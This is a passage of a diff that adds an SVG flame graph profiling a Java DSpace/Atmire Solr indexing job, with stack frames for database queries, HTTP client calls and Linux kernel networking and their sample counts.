+<title>java/util/regex/Pattern:::RemoveQEQuoting (1 samples, 0.09%)</title><rect x="924.6" y="805" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="927.55" y="815.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.09%)</title><rect x="867.6" y="933" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="870.60" y="943.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (3 samples, 0.27%)</title><rect x="740.8" y="853" width="3.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="743.78" y="863.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/ImmutableHttpProcessor:::process (1 samples, 0.09%)</title><rect x="1116.9" y="933" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1119.92" y="943.5" ></text>
+</g>
+<g >
+<title>java/io/FileOutputStream:::write (3 samples, 0.27%)</title><rect x="409.8" y="837" width="3.2" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="412.78" y="847.5" ></text>
+</g>
+<g >
+<title>java/util/LinkedHashMap$LinkedValueIterator:::next (1 samples, 0.09%)</title><rect x="892.3" y="917" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="895.31" y="927.5" ></text>
+</g>
+<g >
+<title>tcp_sendmsg_locked (180 samples, 16.39%)</title><rect x="168.0" y="1189" width="193.4" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="170.98" y="1199.5" >tcp_sendmsg_locked</text>
+</g>
+<g >
+<title>tcp_release_cb (2 samples, 0.18%)</title><rect x="96.0" y="1173" width="2.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="98.97" y="1183.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64_after_hwframe (6 samples, 0.55%)</title><rect x="547.3" y="805" width="6.5" height="15.0" fill="rgb(246,118,118)" rx="2" ry="2" />
+<text  x="550.34" y="815.5" ></text>
+</g>
+<g >
+<title>wake_up_bit (1 samples, 0.09%)</title><rect x="137.9" y="805" width="1.1" height="15.0" fill="rgb(218,76,76)" rx="2" ry="2" />
+<text  x="140.89" y="815.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$BitClass:::isSatisfiedBy (1 samples, 0.09%)</title><rect x="849.3" y="805" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="852.33" y="815.5" ></text>
+</g>
+<g >
+<title>vfs_write (2 samples, 0.18%)</title><rect x="409.8" y="693" width="2.1" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="412.78" y="703.5" ></text>
+</g>
+<g >
+<title>_raw_spin_unlock_irqrestore (1 samples, 0.09%)</title><rect x="356.0" y="1077" width="1.1" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="359.05" y="1087.5" ></text>
+</g>
+<g >
+<title>nft_do_chain (5 samples, 0.46%)</title><rect x="221.7" y="1013" width="5.4" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="224.71" y="1023.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="460.3" y="805" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="463.29" y="815.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (5 samples, 0.46%)</title><rect x="810.6" y="901" width="5.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="813.64" y="911.5" ></text>
+</g>
+<g >
+<title>ext4_file_write_iter (2 samples, 0.18%)</title><rect x="409.8" y="645" width="2.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="412.78" y="655.5" ></text>
+</g>
+<g >
+<title>java/util/HashMap:::resize (1 samples, 0.09%)</title><rect x="732.2" y="901" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="735.19" y="911.5" ></text>
+</g>
+<g >
+<title>default_wake_function (21 samples, 1.91%)</title><rect x="251.8" y="661" width="22.6" height="15.0" fill="rgb(247,119,119)" rx="2" ry="2" />
+<text  x="254.80" y="671.5" >d..</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="10.0" y="1301" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="13.00" y="1311.5" ></text>
+</g>
+<g >
+<title>nf_conntrack_tcp_packet (2 samples, 0.18%)</title><rect x="215.3" y="997" width="2.1" height="15.0" fill="rgb(242,112,112)" rx="2" ry="2" />
+<text  x="218.26" y="1007.5" ></text>
+</g>
+<g >
+<title>JVM_DoPrivileged (1 samples, 0.09%)</title><rect x="1068.6" y="917" width="1.0" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="1071.56" y="927.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64_after_hwframe (54 samples, 4.92%)</title><rect x="84.2" y="1301" width="58.0" height="15.0" fill="rgb(246,118,118)" rx="2" ry="2" />
+<text  x="87.15" y="1311.5" >entry_..</text>
+</g>
+<g >
+<title>org/apache/commons/logging/LogFactory$1:::run (11 samples, 1.00%)</title><rect x="651.6" y="805" width="11.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="654.58" y="815.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/helpers/PatternConverter:::format (1 samples, 0.09%)</title><rect x="1140.6" y="933" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1143.56" y="943.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::processResults (2 samples, 0.18%)</title><rect x="878.3" y="821" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="881.34" y="831.5" ></text>
+</g>
+<g >
+<title>__audit_syscall_exit (1 samples, 0.09%)</title><rect x="411.9" y="709" width="1.1" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="414.93" y="719.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/PoolablePreparedStatement:::close (1 samples, 0.09%)</title><rect x="797.7" y="901" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="800.74" y="911.5" ></text>
+</g>
+<g >
+<title>apic_timer_interrupt (1 samples, 0.09%)</title><rect x="798.8" y="901" width="1.1" height="15.0" fill="rgb(232,96,96)" rx="2" ry="2" />
+<text  x="801.82" y="911.5" ></text>
+</g>
+<g >
+<title>bbr_quantization_budget (1 samples, 0.09%)</title><rect x="165.8" y="1109" width="1.1" height="15.0" fill="rgb(222,83,83)" rx="2" ry="2" />
+<text  x="168.83" y="1119.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::getColumnNames (1 samples, 0.09%)</title><rect x="888.0" y="933" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="891.01" y="943.5" ></text>
+</g>
+<g >
+<title>acpi_ev_gpe_detect (1 samples, 0.09%)</title><rect x="790.2" y="661" width="1.1" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="793.22" y="671.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::execute (3 samples, 0.27%)</title><rect x="878.3" y="837" width="3.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="881.34" y="847.5" ></text>
+</g>
+<g >
+<title>jbyte_disjoint_arraycopy (1 samples, 0.09%)</title><rect x="873.0" y="757" width="1.0" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="875.97" y="767.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (7 samples, 0.64%)</title><rect x="1021.3" y="885" width="7.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1024.28" y="895.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::execute (1 samples, 0.09%)</title><rect x="1172.8" y="965" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1175.81" y="975.5" ></text>
+</g>
+<g >
+<title>do_IRQ (1 samples, 0.09%)</title><rect x="790.2" y="773" width="1.1" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="793.22" y="783.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/io/SocketInputBuffer:::isDataAvailable (2 samples, 0.18%)</title><rect x="461.4" y="901" width="2.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="464.37" y="911.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.27%)</title><rect x="1096.5" y="821" width="3.2" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1099.50" y="831.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="462.4" y="725" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="465.44" y="735.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="569.9" y="885" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="572.91" y="895.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="1061.0" y="965" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1064.04" y="975.5" ></text>
+</g>
+<g >
+<title>pthread_mutex_unlock (1 samples, 0.09%)</title><rect x="453.8" y="789" width="1.1" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="456.84" y="799.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64_after_hwframe (1 samples, 0.09%)</title><rect x="1121.2" y="853" width="1.1" height="15.0" fill="rgb(246,118,118)" rx="2" ry="2" />
+<text  x="1124.22" y="863.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (9 samples, 0.82%)</title><rect x="1020.2" y="917" width="9.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1023.20" y="927.5" ></text>
+</g>
+<g >
+<title>pollwake (21 samples, 1.91%)</title><rect x="251.8" y="677" width="22.6" height="15.0" fill="rgb(249,122,122)" rx="2" ry="2" />
+<text  x="254.80" y="687.5" >p..</text>
+</g>
+<g >
+<title>group_sched_in (1 samples, 0.09%)</title><rect x="1111.5" y="613" width="1.1" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="1114.55" y="623.5" ></text>
+</g>
+<g >
+<title>task_ctx_sched_out (2 samples, 0.18%)</title><rect x="100.3" y="1093" width="2.1" height="15.0" fill="rgb(227,89,89)" rx="2" ry="2" />
+<text  x="103.27" y="1103.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/PGStream:::ReceiveTupleV3 (4 samples, 0.36%)</title><rect x="785.9" y="805" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="788.92" y="815.5" ></text>
+</g>
+<g >
+<title>do_sys_poll (6 samples, 0.55%)</title><rect x="547.3" y="757" width="6.5" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="550.34" y="767.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (5 samples, 0.46%)</title><rect x="785.9" y="885" width="5.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="788.92" y="895.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/pool/impl/GenericKeyedObjectPool:::borrowObject (1 samples, 0.09%)</title><rect x="861.1" y="869" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="864.15" y="879.5" ></text>
+</g>
+<g >
+<title>hrtimer_init_sleeper (1 samples, 0.09%)</title><rect x="547.3" y="693" width="1.1" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="550.34" y="703.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (2 samples, 0.18%)</title><rect x="749.4" y="901" width="2.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="752.38" y="911.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/HttpRequestExecutor:::preProcess (1 samples, 0.09%)</title><rect x="463.5" y="901" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="466.52" y="911.5" ></text>
+</g>
+<g >
+<title>com/atmire/dspace/discovery/ItemCollectionPlugin:::additionalIndex (5 samples, 0.46%)</title><rect x="568.8" y="965" width="5.4" height="15.0" fill="rgb(89,235,89)" rx="2" ry="2" />
+<text  x="571.83" y="975.5" ></text>
+</g>
+<g >
+<title>[libnet.so] (1 samples, 0.09%)</title><rect x="1083.6" y="853" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1086.61" y="863.5" ></text>
+</g>
+<g >
+<title>tcp_v4_rcv (1 samples, 0.09%)</title><rect x="1078.2" y="261" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="1081.23" y="271.5" ></text>
+</g>
+<g >
+<title>java/util/StringTokenizer:::nextToken (1 samples, 0.09%)</title><rect x="904.1" y="837" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="907.13" y="847.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketOutputStream_socketWrite0 (1 samples, 0.09%)</title><rect x="1079.3" y="885" width="1.1" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="1082.31" y="895.5" ></text>
+</g>
+<g >
+<title>schedule_hrtimeout_range (3 samples, 0.27%)</title><rect x="1109.4" y="773" width="3.2" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="1112.40" y="783.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (1 samples, 0.09%)</title><rect x="1078.2" y="725" width="1.1" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="1081.23" y="735.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64_after_hwframe (3 samples, 0.27%)</title><rect x="1109.4" y="853" width="3.2" height="15.0" fill="rgb(246,118,118)" rx="2" ry="2" />
+<text  x="1112.40" y="863.5" ></text>
+</g>
+<g >
+<title>nft_do_chain (22 samples, 2.00%)</title><rect x="306.6" y="821" width="23.7" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="309.61" y="831.5" >n..</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="852.6" y="869" width="1.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="855.55" y="879.5" ></text>
+</g>
+<g >
+<title>nf_hook_slow (8 samples, 0.73%)</title><rect x="293.7" y="821" width="8.6" height="15.0" fill="rgb(242,112,112)" rx="2" ry="2" />
+<text  x="296.72" y="831.5" ></text>
+</g>
+<g >
+<title>__tcp_send_ack.part.0 (1 samples, 0.09%)</title><rect x="249.7" y="709" width="1.0" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="252.65" y="719.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (1 samples, 0.09%)</title><rect x="838.6" y="885" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="841.58" y="895.5" ></text>
+</g>
+<g >
+<title>java/security/AccessController:::doPrivileged (2 samples, 0.18%)</title><rect x="1068.6" y="933" width="2.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1071.56" y="943.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::processResults (1 samples, 0.09%)</title><rect x="760.1" y="837" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="763.13" y="847.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::createMethod (39 samples, 3.55%)</title><rect x="381.8" y="949" width="42.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="384.84" y="959.5" >org..</text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::loadParameters (1 samples, 0.09%)</title><rect x="1040.6" y="949" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1043.62" y="959.5" ></text>
+</g>
+<g >
+<title>tcp_ack (1 samples, 0.09%)</title><rect x="165.8" y="1125" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="168.83" y="1135.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (4 samples, 0.36%)</title><rect x="811.7" y="853" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="814.71" y="863.5" ></text>
+</g>
+<g >
+<title>__handle_irq_event_percpu (1 samples, 0.09%)</title><rect x="790.2" y="709" width="1.1" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="793.22" y="719.5" ></text>
+</g>
+<g >
+<title>__wake_up_common_lock (22 samples, 2.00%)</title><rect x="251.8" y="709" width="23.6" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="254.80" y="719.5" >_..</text>
+</g>
+<g >
+<title>java/util/HashMap:::get (1 samples, 0.09%)</title><rect x="1050.3" y="981" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1053.29" y="991.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="1068.6" y="901" width="1.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1071.56" y="911.5" ></text>
+</g>
+<g >
+<title>__release_sock (1 samples, 0.09%)</title><rect x="165.8" y="1173" width="1.1" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="168.83" y="1183.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/common/util/JavaBinCodec:::readArray (1 samples, 0.09%)</title><rect x="1125.5" y="901" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1128.52" y="911.5" ></text>
+</g>
+<g >
+<title>org/dspace/servicemanager/DSpaceServiceManager:::getServicesByType (115 samples, 10.47%)</title><rect x="892.3" y="965" width="123.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="895.31" y="975.5" >org/dspace/serv..</text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (2 samples, 0.18%)</title><rect x="760.1" y="917" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="763.13" y="927.5" ></text>
+</g>
+<g >
+<title>Interpreter (1 samples, 0.09%)</title><rect x="1121.2" y="949" width="1.1" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="1124.22" y="959.5" ></text>
+</g>
+<g >
+<title>__send (213 samples, 19.40%)</title><rect x="142.2" y="1317" width="228.9" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="145.19" y="1327.5" >__send</text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingResultSet:::wasNull (1 samples, 0.09%)</title><rect x="809.6" y="885" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="812.56" y="895.5" ></text>
+</g>
+<g >
+<title>java/text/DateFormatSymbols:::getProviderInstance (1 samples, 0.09%)</title><rect x="488.2" y="789" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="491.23" y="799.5" ></text>
+</g>
+<g >
+<title>ip_finish_output (1 samples, 0.09%)</title><rect x="1078.2" y="517" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="1081.23" y="527.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::createMethod (7 samples, 0.64%)</title><rect x="1051.4" y="981" width="7.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1054.37" y="991.5" ></text>
+</g>
+<g >
+<title>java/net/URI:::&lt;init&gt; (1 samples, 0.09%)</title><rect x="465.7" y="917" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="468.66" y="927.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::processResults (4 samples, 0.36%)</title><rect x="1023.4" y="837" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1026.42" y="847.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/DSpaceObject:::getMetadata (3 samples, 0.27%)</title><rect x="618.3" y="949" width="3.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="621.27" y="959.5" ></text>
+</g>
+<g >
+<title>com/atmire/dspace/discovery/AtmireSolrService:::indexContent (703 samples, 64.03%)</title><rect x="375.4" y="997" width="755.5" height="15.0" fill="rgb(89,235,89)" rx="2" ry="2" />
+<text  x="378.39" y="1007.5" >com/atmire/dspace/discovery/AtmireSolrService:::indexContent</text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::process (4 samples, 0.36%)</title><rect x="816.0" y="933" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="819.01" y="943.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/ManagedClientConnectionImpl:::sendRequestEntity (31 samples, 2.82%)</title><rect x="425.9" y="885" width="33.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="428.90" y="895.5" >or..</text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeWithFlags (1 samples, 0.09%)</title><rect x="867.6" y="869" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="870.60" y="879.5" ></text>
+</g>
+<g >
+<title>__hrtimer_get_next_event (1 samples, 0.09%)</title><rect x="1018.1" y="821" width="1.0" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="1021.05" y="831.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::processResults (1 samples, 0.09%)</title><rect x="827.8" y="821" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="830.83" y="831.5" ></text>
+</g>
+<g >
+<title>blk_mq_complete_request (1 samples, 0.09%)</title><rect x="137.9" y="1093" width="1.1" height="15.0" fill="rgb(220,79,79)" rx="2" ry="2" />
+<text  x="140.89" y="1103.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/AbstractHttpClient:::doExecute (38 samples, 3.46%)</title><rect x="423.8" y="933" width="40.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="426.75" y="943.5" >org..</text>
+</g>
+<g >
+<title>try_to_wake_up (1 samples, 0.09%)</title><rect x="137.9" y="677" width="1.1" height="15.0" fill="rgb(237,105,105)" rx="2" ry="2" />
+<text  x="140.89" y="687.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketInputStream_socketRead0 (1 samples, 0.09%)</title><rect x="884.8" y="789" width="1.1" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="887.79" y="799.5" ></text>
+</g>
+<g >
+<title>sock_def_readable (23 samples, 2.09%)</title><rect x="250.7" y="741" width="24.7" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="253.73" y="751.5" >s..</text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (6 samples, 0.55%)</title><rect x="733.3" y="917" width="6.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="736.26" y="927.5" ></text>
+</g>
+<g >
+<title>ip_local_deliver_finish (1 samples, 0.09%)</title><rect x="1078.2" y="293" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="1081.23" y="303.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (747 samples, 68.03%)</title><rect x="372.2" y="1109" width="802.8" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="375.17" y="1119.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>org/apache/http/protocol/RequestContent:::process (1 samples, 0.09%)</title><rect x="558.1" y="869" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="561.09" y="879.5" ></text>
+</g>
+<g >
+<title>do_IRQ (1 samples, 0.09%)</title><rect x="137.9" y="1189" width="1.1" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="140.89" y="1199.5" ></text>
+</g>
+<g >
+<title>sockfd_lookup_light (1 samples, 0.09%)</title><rect x="136.8" y="1237" width="1.1" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="139.81" y="1247.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (4 samples, 0.36%)</title><rect x="811.7" y="837" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="814.71" y="847.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (1 samples, 0.09%)</title><rect x="873.0" y="917" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="875.97" y="927.5" ></text>
+</g>
+<g >
+<title>smp_apic_timer_interrupt (1 samples, 0.09%)</title><rect x="964.3" y="885" width="1.1" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="967.32" y="895.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (747 samples, 68.03%)</title><rect x="372.2" y="1253" width="802.8" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="375.17" y="1263.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>org/springframework/core/convert/support/ArrayToObjectConverter:::getConvertibleTypes (1 samples, 0.09%)</title><rect x="679.5" y="885" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="682.53" y="895.5" ></text>
+</g>
+<g >
+<title>__netif_receive_skb (92 samples, 8.38%)</title><rect x="233.5" y="901" width="98.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="236.53" y="911.5" >__netif_rec..</text>
+</g>
+<g >
+<title>ip_finish_output2 (108 samples, 9.84%)</title><rect x="228.2" y="1013" width="116.0" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="231.16" y="1023.5" >ip_finish_outp..</text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (3 samples, 0.27%)</title><rect x="832.1" y="917" width="3.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="835.13" y="927.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::tryExecute (33 samples, 3.01%)</title><rect x="425.9" y="901" width="35.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="428.90" y="911.5" >org..</text>
+</g>
+<g >
+<title>__local_bh_enable_ip (1 samples, 0.09%)</title><rect x="1078.2" y="469" width="1.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="1081.23" y="479.5" ></text>
+</g>
+<g >
+<title>_copy_to_iter (1 samples, 0.09%)</title><rect x="132.5" y="1141" width="1.1" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="135.51" y="1151.5" ></text>
+</g>
+<g >
+<title>simple_copy_to_iter (1 samples, 0.09%)</title><rect x="132.5" y="1157" width="1.1" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="135.51" y="1167.5" ></text>
+</g>
+<g >
+<title>[libjava.so] (3 samples, 0.27%)</title><rect x="409.8" y="789" width="3.2" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="412.78" y="799.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/Item:::getCollections (5 samples, 0.46%)</title><rect x="568.8" y="949" width="5.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="571.83" y="959.5" ></text>
+</g>
+<g >
+<title>iptable_mangle_hook (2 samples, 0.18%)</title><rect x="291.6" y="821" width="2.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="294.57" y="831.5" ></text>
+</g>
+<g >
+<title>__hrtimer_next_event_base (1 samples, 0.09%)</title><rect x="1018.1" y="805" width="1.0" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="1021.05" y="815.5" ></text>
+</g>
+<g >
+<title>__ip_queue_xmit (137 samples, 12.48%)</title><rect x="200.2" y="1093" width="147.2" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="203.22" y="1103.5" >__ip_queue_xmit</text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (8 samples, 0.73%)</title><rect x="1033.1" y="965" width="8.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
